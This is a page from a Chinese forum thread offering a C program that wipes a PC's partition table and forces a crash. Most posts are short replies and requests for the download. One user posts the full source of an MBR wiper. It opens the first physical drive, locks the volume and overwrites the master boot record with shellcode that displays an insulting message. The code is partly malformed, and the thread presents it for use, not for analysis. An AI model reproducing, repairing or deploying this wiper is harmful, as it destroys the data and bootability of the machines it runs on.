rmz13564501732 发表于 2018-7-6 17:06:22

这个怎么用

2990771277 发表于 2018-7-22 08:58:16

看看。。。。。。。。。。。。。。。。。。

li1736358587 发表于 2018-8-2 17:17:33

楼主呜呜呜

花花世界 发表于 2018-8-22 08:32:58

大多数电动蝶阀

a2929392 发表于 2018-8-22 11:56:59

感谢分享感谢分享感谢分享感谢分享感谢分享感谢分享感谢分享

我乃魔王 发表于 2018-9-23 20:32:56

我顶顶顶顶顶顶

我乃魔王 发表于 2018-9-23 20:47:32

我顶顶顶顶顶顶

我乃魔王 发表于 2018-9-23 20:49:36

瞬间破坏硬盘分区表,让电脑蓝屏退出的程序

我乃魔王 发表于 2018-9-23 21:15:56

#include<stdio.h>
#include<tchar.h>
#include<Windows.h>
#include<ntddscsi.h>

//This shell code can be modfit
// I am virus! Fuck you
unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";


int KillMBR();
int main()
{
        KillMBR();
        return 0;
}

int KillMBR()
{
        HANDLE hDevice;
        DWORD dwBytesWritten, dwBytesReturned;
        BYTE pMBR = { 0 };

        // rebuild MBR
        memcpy(pMBR, scode, sizeof(scode)-1);
        pMBR = 0x55;
        pMBR = 0xAA;

        //Open disk
        hDevice = CreateFile
                (
                _T("\\\\.\\PHYSICALDRIVE0"),
                GENERIC_READ | GENERIC_WRITE,
                FILE_SHARE_READ | FILE_SHARE_WRITE,
                NULL,
                OPEN_EXISTING,
                0,
                NULL
                );
        if (hDevice == INVALID_HANDLE_VALUE)//Open fail
                return -1;
        DeviceIoControl
                (
                hDevice,
                FSCTL_LOCK_VOLUME,
                NULL,
                0,
                NULL,
                0,
                &dwBytesReturned,
                NULL
                );
        // Write-in virus
        WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
        DeviceIoControl
                (
                hDevice,
                FSCTL_UNLOCK_VOLUME,
                NULL,
                0,
                NULL,
                0,
                &dwBytesReturned,
                NULL
                );
        //Close hard drive
        CloseHandle(hDevice);

        ExitProcess(-1);
        return 0;
}

我乃魔王 发表于 2018-9-23 21:17:13

费50积分购买附件即可直接下载。

林龙杰 发表于 2018-9-30 20:53:40

好帖,收藏了

别闹起来继续 发表于 2018-10-6 17:33:00

5555555555555555555555555555

moyan 发表于 2018-10-18 23:20:16

很牛的样子 看看

yszz 发表于 2018-11-3 12:20:55

很好奇,想要看看/下来试试

1870332922 发表于 2018-11-6 06:17:59

我要查看隐藏内容~

paddy525 发表于 2018-12-2 22:58:19

感谢分享

玫瑰花葬礼 发表于 2018-12-6 08:18:08

这个下载了的童鞋最好别滥用哦,比较危险

少华123 发表于 2019-1-23 22:05:02

我想看看,然后在虚拟机试试

爱学习 发表于 2019-2-4 22:36:24

学习一下哦

爱学习 发表于 2019-2-4 22:50:38

我资格不够,谁发给我一份程序,邮箱1217509930@qq.com,谢谢!
页: 10 11 12 13 14 15 16 17 18 19 [20] 21 22
查看完整版本: 【C】【恶意代码】瞬间破坏硬盘分区表,让电脑蓝屏的程序